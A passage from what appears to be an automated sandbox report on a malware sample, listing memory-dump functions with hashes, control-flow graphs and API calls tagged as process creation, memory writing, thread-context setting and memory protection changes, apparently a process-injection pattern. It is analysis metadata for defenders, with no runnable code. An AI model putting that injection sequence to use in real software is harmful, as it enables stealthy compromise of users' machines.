                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 83d2ff96dd66596c6843fe5bd3db1e986554c0a121f565302d891d454593a283
                                                                  • Instruction ID: 0ee4deb78791077d78060a30cd2a4f0342209732e20cb2c344493e68438934dc
                                                                  • Opcode Fuzzy Hash: 83d2ff96dd66596c6843fe5bd3db1e986554c0a121f565302d891d454593a283
                                                                  • Instruction Fuzzy Hash: CB1117B1D003098FDB10DFAAC48479EFBF4AF88224F54842AD519A7240C7789945CFA1
                                                                  Function 05DBC9A8 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h
                                                                  • API String ID: 0-2439710439
                                                                  • Opcode ID: 1c5fe5620c7a505f95d09bf374bf34e8c07f4e9a2105dbbc21c98558c486ce16
                                                                  • Instruction ID: dbf10355c4612a4396d022e6f15ec062a3e033eef4b6e18a49b8818bb6ee3b39
                                                                  • Opcode Fuzzy Hash: 1c5fe5620c7a505f95d09bf374bf34e8c07f4e9a2105dbbc21c98558c486ce16
                                                                  • Instruction Fuzzy Hash: E281F571E00629CBEB64DF69C850AD9B7B2FF89300F5082AAD55DB7254DB306E85CF90
                                                                  Function 06C40040 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J
                                                                  • API String ID: 0-1141589763
                                                                  • Opcode ID: fbbb3100db19a224cd80be2ddd42be099d677e1b4c32a7dce057fa8c991206f6
                                                                  • Instruction ID: 93f14298c5d0ba292e0a9168c333db9a8347b737755f91d787f88a21d80c37a6
                                                                  • Opcode Fuzzy Hash: fbbb3100db19a224cd80be2ddd42be099d677e1b4c32a7dce057fa8c991206f6
                                                                  • Instruction Fuzzy Hash: F9319BB1E516288BEB69DF6BDC4069DBAFBBFC8204F04D1AAD50CA6255D7700B818F40
                                                                  Function 0704E2B0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PZT
                                                                  • API String ID: 0-3004033766
                                                                  • Opcode ID: 586ec178dca37b247425657d7ab490bd3d89969cc7f3535238b58ec6f1db0908
                                                                  • Instruction ID: 8c1b7cf2f7f2ab88810e702392f7c30b3026759fea5de971d58b1f70279197d5
                                                                  • Opcode Fuzzy Hash: 586ec178dca37b247425657d7ab490bd3d89969cc7f3535238b58ec6f1db0908
                                                                  • Instruction Fuzzy Hash: 013130B4A01214DFEBA4CF29D995BADB7F6FB48300F5081AAD40AA7354DB359E80CF40
                                                                  Function 06C474B0 Relevance: .3, Instructions: 255COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f493aaf239085151670b92aaa12b67201498c27960d3d13951c6418ae24a329
                                                                  • Instruction ID: 07fb1aa29c4df3834085177514083bd871b417db1ec479ccd783c800304bc045
                                                                  • Opcode Fuzzy Hash: 9f493aaf239085151670b92aaa12b67201498c27960d3d13951c6418ae24a329
                                                                  • Instruction Fuzzy Hash: 30B10570E05218CFEB94DF6AD584BADBBF2FB89304F6080A9D409A7251DB745D85CF50
                                                                  Function 06C474A0 Relevance: .3, Instructions: 252COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16d9155e111fb61f4a3f5689f2dc30ff0e66fe59ea4631e0d239de8323a1c74d
                                                                  • Instruction ID: 60b6407b9814b7b642f43dc47cb1b491060b153895eba0b10a6bf6082c5dc4c6
                                                                  • Opcode Fuzzy Hash: 16d9155e111fb61f4a3f5689f2dc30ff0e66fe59ea4631e0d239de8323a1c74d
                                                                  • Instruction Fuzzy Hash: DBB10570E05218CFEBA4DFAAD584B9DBBF2FB88304F2080A9D409A7251DB745A85CF50
                                                                  Function 0134A041 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57e827e9afa812d64de0cbfc725bca5c3fd37e0d3c24bdb611fa82a839b6e09b
                                                                  • Instruction ID: 3d139aabc7914575da76d700d742241872c492a1e70b1cc92422446acd8d8e7f
                                                                  • Opcode Fuzzy Hash: 57e827e9afa812d64de0cbfc725bca5c3fd37e0d3c24bdb611fa82a839b6e09b
                                                                  • Instruction Fuzzy Hash: 4751BF74D4522CCBEB24CF29C984BD9BBF5BB49304F1086EAD40AA3655DB346AC5CF50
                                                                  Function 0134A067 Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b0de22fe2902bf4dbaaaba7a4a07c8f6045a1d9ff2594c8d8dd9831b6dcb063
                                                                  • Instruction ID: 5e80c100349db59c90683f233bd8ffb6698bceafcde3690daa01cb5697622da5
                                                                  • Opcode Fuzzy Hash: 4b0de22fe2902bf4dbaaaba7a4a07c8f6045a1d9ff2594c8d8dd9831b6dcb063
                                                                  • Instruction Fuzzy Hash: 3C51B074D4122CCBEB64CF29C980BD9B7F5BB49304F1086EAD40AA3655DB346AC5CF50
                                                                  Function 05DB9B6C Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 5db9b6c-5db9b70 1 5dba0ab-5dba126 0->1 2 5db9b76-5db9b80 0->2 27 5dba129 call 6d62b90 1->27 28 5dba129 call 6d62b8b 1->28 2->1 7 5dba12b-5dba159 8 5db910f-5db9118 7->8 9 5dba15f-5dba16a 7->9 10 5db911a 8->10 11 5db9121-5db9450 8->11 9->8 12 5db9059-5db9080 10->12 13 5db908f-5db90b7 10->13 14 5db90cf-5db9101 10->14 15 5db94f6-5db9526 10->15 11->8 17 5db903b-5db9044 12->17 18 5db9082-5db908d 12->18 13->17 21 5db90b9-5db90c4 13->21 14->8 15->8 20 5db952c-5db9537 15->20 22 5db904d-5dba623 17->22 23 5db9046 17->23 18->17 20->8 21->17 22->17 23->22 27->7 28->7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$>$D
                                                                  • API String ID: 0-588199494
                                                                  • Opcode ID: 8a751b2cb9bb488d88df7af4d255b89983017a4acea1408ce800401082bf93a0
                                                                  • Instruction ID: c4a2e4065a3a9a90e8c9e56f69e32637c82dad2db3f6a6ab5d00efb876abdf47
                                                                  • Opcode Fuzzy Hash: 8a751b2cb9bb488d88df7af4d255b89983017a4acea1408ce800401082bf93a0
                                                                  • Instruction Fuzzy Hash: 1E419FB4905258CBEBA0DF58C898BE9BBB2AB49305F50809AD50EA7340CB755EC9CF54
                                                                  Function 05DB922B Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 317 5db922b-5db922f 318 5dba085-5dba126 317->318 319 5db9235-5db9240 317->319 347 5dba129 call 6d62b90 318->347 348 5dba129 call 6d62b8b 318->348 320 5db910f-5db9118 319->320 321 5db911a 320->321 322 5db9121-5db9450 320->322 324 5db9059-5db9080 321->324 325 5db908f-5db90b7 321->325 326 5db90cf-5db9101 321->326 327 5db94f6-5db9526 321->327 322->320 329 5db903b-5db9044 324->329 330 5db9082-5db908d 324->330 325->329 334 5db90b9-5db90c4 325->334 326->320 327->320 332 5db952c-5db9537 327->332 335 5db904d-5dba623 329->335 336 5db9046 329->336 330->329 332->320 334->329 335->329 336->335 345 5dba12b-5dba159 345->320 346 5dba15f-5dba16a 345->346 346->320 347->345 348->345
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$>
                                                                  • API String ID: 0-3803789803
                                                                  • Opcode ID: 52e21fde8f2cb011e5ed501a1bd7855db7a48cd6974ba045c93a03e7b466246f
                                                                  • Instruction ID: 44be1ec7e4660c128e3f62ff1a1af652522ca20910ca03b8fd87068d44338fee
                                                                  • Opcode Fuzzy Hash: 52e21fde8f2cb011e5ed501a1bd7855db7a48cd6974ba045c93a03e7b466246f
                                                                  • Instruction Fuzzy Hash: 62419F74901268CBEBA4DF58C898BE9BBB2BB49304F5080DAD50EAB354CB755EC5CF04
                                                                  Function 05DB949E Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 349 5db949e-5dba126 375 5dba129 call 6d62b90 349->375 376 5dba129 call 6d62b8b 349->376 355 5dba12b-5dba159 356 5db910f-5db9118 355->356 357 5dba15f-5dba16a 355->357 358 5db911a 356->358 359 5db9121-5db9450 356->359 357->356 360 5db9059-5db9080 358->360 361 5db908f-5db90b7 358->361 362 5db90cf-5db9101 358->362 363 5db94f6-5db9526 358->363 359->356 365 5db903b-5db9044 360->365 366 5db9082-5db908d 360->366 361->365 369 5db90b9-5db90c4 361->369 362->356 363->356 368 5db952c-5db9537 363->368 370 5db904d-5dba623 365->370 371 5db9046 365->371 366->365 368->356 369->365 370->365 371->370 375->355 376->355
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$>
                                                                  • API String ID: 0-3803789803
                                                                  • Opcode ID: f3c9ac4fc02463d5d6927d66abf6574d40ffb3291f009c5a70cda1ba0b91d535
                                                                  • Instruction ID: b2f331feab9f7c2793cb3a4d63fd8aa8eabb6fe0ddc8feacb039a9e48de84445
                                                                  • Opcode Fuzzy Hash: f3c9ac4fc02463d5d6927d66abf6574d40ffb3291f009c5a70cda1ba0b91d535
                                                                  • Instruction Fuzzy Hash: B841A0B4905258CFEBA0DF58C898BE9BBB2BB49304F5080DAD50EA7340CB755EC58F10
                                                                  Function 05DB9246 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 377 5db9246-5db9249 378 5db924b 377->378 379 5db9233-5db9240 377->379 381 5db91eb-5db9200 378->381 382 5db924d 378->382 380 5db910f-5db9118 379->380 383 5db911a 380->383 384 5db9121-5db9450 380->384 401 5db9203 call 6d62580 381->401 402 5db9203 call 6d62588 381->402 386 5db9059-5db9080 383->386 387 5db908f-5db90b7 383->387 388 5db90cf-5db9101 383->388 389 5db94f6-5db9526 383->389 384->380 385 5db9205-5db9226 391 5db903b-5db9044 386->391 392 5db9082-5db908d 386->392 387->391 395 5db90b9-5db90c4 387->395 388->380 389->380 394 5db952c-5db9537 389->394 396 5db904d-5dba623 391->396 397 5db9046 391->397 392->391 394->380 395->391 396->391 397->396 401->385 402->385
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +$2
                                                                  • API String ID: 0-4066820149
                                                                  • Opcode ID: 5c5a4c67f60944890dd842301ecf931b060dfe6239fe984f4c47771ac3ca36d9
                                                                  • Instruction ID: d199b32f425d3ddd5722c89900a3c816f0c7969542f33acbe998e42e33eb75c9
                                                                  • Opcode Fuzzy Hash: 5c5a4c67f60944890dd842301ecf931b060dfe6239fe984f4c47771ac3ca36d9
                                                                  • Instruction Fuzzy Hash: 6931C5B0905258CFEB60CF54C854BE9BBB2AB49344F5080DAD14EB7240CB759AC5CF14
                                                                  Function 05DB9563 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 403 5db9563-5db9574 416 5db957a call 6d61910 403->416 417 5db957a call 6d61920 403->417 406 5db9580-5db9613 414 5db9616 call 6d61e71 406->414 415 5db9616 call 6d61e78 406->415 411 5db9618-5db9625 412 5db962b-5db962c 411->412 413 5dba3d8-5dba3fa 411->413 412->413 414->411 415->411 416->406 417->406
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: )$A
                                                                  • API String ID: 0-955135197
                                                                  • Opcode ID: f82e98ba2979a590ff788dbe87ba0885a3d212a268a0a4b9196396d26c24f619
                                                                  • Instruction ID: 93f8e2a950810c1133a44a86caea136c3f71efe90e2b6659ea7fce682af1c2b8
                                                                  • Opcode Fuzzy Hash: f82e98ba2979a590ff788dbe87ba0885a3d212a268a0a4b9196396d26c24f619
                                                                  • Instruction Fuzzy Hash: AF21AC74A05228CFDBA1DF64C988BD9BBB6FB49308F1081D9D44EA7245DB359E85CF40
                                                                  Function 06D6097D Relevance: 1.7, APIs: 1, Instructions: 206processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1156 6d6097d-6d60986 1157 6d6098d-6d609f8 1156->1157 1158 6d60988-6d6098c 1156->1158 1160 6d60a31-6d60a51 1157->1160 1161 6d609fa-6d60a04 1157->1161 1158->1157 1166 6d60a53-6d60a5d 1160->1166 1167 6d60a8a-6d60ac4 1160->1167 1161->1160 1162 6d60a06-6d60a08 1161->1162 1164 6d60a0a-6d60a14 1162->1164 1165 6d60a2b-6d60a2e 1162->1165 1168 6d60a16 1164->1168 1169 6d60a18-6d60a27 1164->1169 1165->1160 1166->1167 1171 6d60a5f-6d60a61 1166->1171 1177 6d60ac6-6d60ad0 1167->1177 1178 6d60afd-6d60b72 CreateProcessA 1167->1178 1168->1169 1169->1169 1170 6d60a29 1169->1170 1170->1165 1172 6d60a84-6d60a87 1171->1172 1173 6d60a63-6d60a6d 1171->1173 1172->1167 1175 6d60a71-6d60a80 1173->1175 1176 6d60a6f 1173->1176 1175->1175 1180 6d60a82 1175->1180 1176->1175 1177->1178 1179 6d60ad2-6d60ad4 1177->1179 1188 6d60b74-6d60b7a 1178->1188 1189 6d60b7b-6d60bc3 1178->1189 1181 6d60ad6-6d60ae0 1179->1181 1182 6d60af7-6d60afa 1179->1182 1180->1172 1184 6d60ae4-6d60af3 1181->1184 1185 6d60ae2 1181->1185 1182->1178 1184->1184 1186 6d60af5 1184->1186 1185->1184 1186->1182 1188->1189 1194 6d60bc5-6d60bc9 1189->1194 1195 6d60bd3-6d60bd7 1189->1195 1194->1195 1196 6d60bcb 1194->1196 1197 6d60be7-6d60beb 1195->1197 1198 6d60bd9-6d60bdd 1195->1198 1196->1195 1199 6d60bed-6d60bf1 1197->1199 1200 6d60bfb 1197->1200 1198->1197 1201 6d60bdf 1198->1201 1199->1200 1202 6d60bf3 1199->1202 1203 6d60bfc 1200->1203 1201->1197 1202->1200 1203->1203
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D60B62
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: af7b5f169c3050b7586c2ae97d022ed553a37d897d6d2a98bc9d20fc3ab0b773
                                                                  • Instruction ID: 4fe9f0106b5cda239a4d6239cd1745ce070c9d8337581031429c063f74cded78
                                                                  • Opcode Fuzzy Hash: af7b5f169c3050b7586c2ae97d022ed553a37d897d6d2a98bc9d20fc3ab0b773
                                                                  • Instruction Fuzzy Hash: 27812571D006599FDB50CFAAC981BEEBBF2BF48354F14852AE859E7280D7749881CF81
                                                                  Function 06D60988 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1204 6d60988-6d609f8 1207 6d60a31-6d60a51 1204->1207 1208 6d609fa-6d60a04 1204->1208 1213 6d60a53-6d60a5d 1207->1213 1214 6d60a8a-6d60ac4 1207->1214 1208->1207 1209 6d60a06-6d60a08 1208->1209 1211 6d60a0a-6d60a14 1209->1211 1212 6d60a2b-6d60a2e 1209->1212 1215 6d60a16 1211->1215 1216 6d60a18-6d60a27 1211->1216 1212->1207 1213->1214 1218 6d60a5f-6d60a61 1213->1218 1224 6d60ac6-6d60ad0 1214->1224 1225 6d60afd-6d60b72 CreateProcessA 1214->1225 1215->1216 1216->1216 1217 6d60a29 1216->1217 1217->1212 1219 6d60a84-6d60a87 1218->1219 1220 6d60a63-6d60a6d 1218->1220 1219->1214 1222 6d60a71-6d60a80 1220->1222 1223 6d60a6f 1220->1223 1222->1222 1227 6d60a82 1222->1227 1223->1222 1224->1225 1226 6d60ad2-6d60ad4 1224->1226 1235 6d60b74-6d60b7a 1225->1235 1236 6d60b7b-6d60bc3 1225->1236 1228 6d60ad6-6d60ae0 1226->1228 1229 6d60af7-6d60afa 1226->1229 1227->1219 1231 6d60ae4-6d60af3 1228->1231 1232 6d60ae2 1228->1232 1229->1225 1231->1231 1233 6d60af5 1231->1233 1232->1231 1233->1229 1235->1236 1241 6d60bc5-6d60bc9 1236->1241 1242 6d60bd3-6d60bd7 1236->1242 1241->1242 1243 6d60bcb 1241->1243 1244 6d60be7-6d60beb 1242->1244 1245 6d60bd9-6d60bdd 1242->1245 1243->1242 1246 6d60bed-6d60bf1 1244->1246 1247 6d60bfb 1244->1247 1245->1244 1248 6d60bdf 1245->1248 1246->1247 1249 6d60bf3 1246->1249 1250 6d60bfc 1247->1250 1248->1244 1249->1247 1250->1250
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D60B62
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 185ec9694d0e670921c0081256a5800085d172b3ee73bbb9927894698b342adc
                                                                  • Instruction ID: 4c4cd11c9b22a8562f351e8218c146cfc3ba13df8eb6388af8eca4e638d58cf2
                                                                  • Opcode Fuzzy Hash: 185ec9694d0e670921c0081256a5800085d172b3ee73bbb9927894698b342adc
                                                                  • Instruction Fuzzy Hash: AE812471D006599FDB50CFAAC981BEEBBF2BF48354F148529E859E7280DB749881CF81
                                                                  Function 06D61E71 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1251 6d61e71-6d61e76 1252 6d61e7d-6d61ec6 1251->1252 1253 6d61e78-6d61e7c 1251->1253 1255 6d61ed6-6d61f15 WriteProcessMemory 1252->1255 1256 6d61ec8-6d61ed4 1252->1256 1253->1252 1258 6d61f17-6d61f1d 1255->1258 1259 6d61f1e-6d61f4e 1255->1259 1256->1255 1258->1259
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D61F08
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: f97fb9602507546890342509c57979adaac897bb323da9b48e1cd314ef9d0fc1
                                                                  • Instruction ID: 65516c5d9c7b003c951f06cff592ed43e654ace3c06db5c0be30f2c8d90c374c
                                                                  • Opcode Fuzzy Hash: f97fb9602507546890342509c57979adaac897bb323da9b48e1cd314ef9d0fc1
                                                                  • Instruction Fuzzy Hash: 50211576900349DFDB10DFAAC884BDEBBF5FF88310F14842AE919A7241D7789955CBA0
                                                                  Function 06D61E78 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1273 6d61e78-6d61ec6 1276 6d61ed6-6d61f15 WriteProcessMemory 1273->1276 1277 6d61ec8-6d61ed4 1273->1277 1279 6d61f17-6d61f1d 1276->1279 1280 6d61f1e-6d61f4e 1276->1280 1277->1276 1279->1280
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D61F08
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 327a614ac9ed7e3a468033940d53aad80589999e9a2479717e154c29c2fcca88
                                                                  • Instruction ID: e35f09b033d8b52217ee3a4fada7f5d8d1558924215a27da2262fe0b01c79a07
                                                                  • Opcode Fuzzy Hash: 327a614ac9ed7e3a468033940d53aad80589999e9a2479717e154c29c2fcca88
                                                                  • Instruction Fuzzy Hash: AE212672900349DFDB00CFAAC884BDEBBF5FF48310F10842AE919A7240D7789954CBA0
                                                                  Function 06D62580 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1284 6d62580-6d62586 1285 6d6258d-6d625d3 1284->1285 1286 6d62588-6d6258c 1284->1286 1288 6d625d5-6d625e1 1285->1288 1289 6d625e3-6d62613 Wow64SetThreadContext 1285->1289 1286->1285 1288->1289 1291 6d62615-6d6261b 1289->1291 1292 6d6261c-6d6264c 1289->1292 1291->1292
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D62606
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: e8a8f8e608182c8882e765a54496f13a33ecd5fea9edc2cfb5757197bd561e68
                                                                  • Instruction ID: 4227d9415b001233d17c2c36aaffa30db42ec698341cfd9d2c03746f0e9f1632
                                                                  • Opcode Fuzzy Hash: e8a8f8e608182c8882e765a54496f13a33ecd5fea9edc2cfb5757197bd561e68
                                                                  • Instruction Fuzzy Hash: 09213A71D003098FDB50DFAAC4857EEBBF4EF88364F54842AD519A7240D7789A45CFA1
                                                                  Function 06D62588 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1305 6d62588-6d625d3 1308 6d625d5-6d625e1 1305->1308 1309 6d625e3-6d62613 Wow64SetThreadContext 1305->1309 1308->1309 1311 6d62615-6d6261b 1309->1311 1312 6d6261c-6d6264c 1309->1312 1311->1312
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D62606
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726029763.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d60000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: b95ac859798f3c110248826e88d6f478fad78c574877ba24aa737cc8c3714aa6
                                                                  • Instruction ID: 039557c5641a145e6a5f7bf74c8b45797b882da509faef70ac20f15b40624d52
                                                                  • Opcode Fuzzy Hash: b95ac859798f3c110248826e88d6f478fad78c574877ba24aa737cc8c3714aa6
                                                                  • Instruction Fuzzy Hash: 57214971D003098FDB10DFAAC8847EEBBF4EF88364F54842AD519A7240C7789945CFA1
                                                                  Function 06D7D780 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06D7D7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726094094.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6d70000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 8f5d98dd2a57905fd97feb9f8a3653ef68534b38e9ac38e7c58ffd11f00642a7
                                                                  • Instruction ID: 0f27f59c6da259e630b555e5a2fd1d6778ba11398fce7feb3932738629cc8550
                                                                  • Opcode Fuzzy Hash: 8f5d98dd2a57905fd97feb9f8a3653ef68534b38e9ac38e7c58ffd11f00642a7
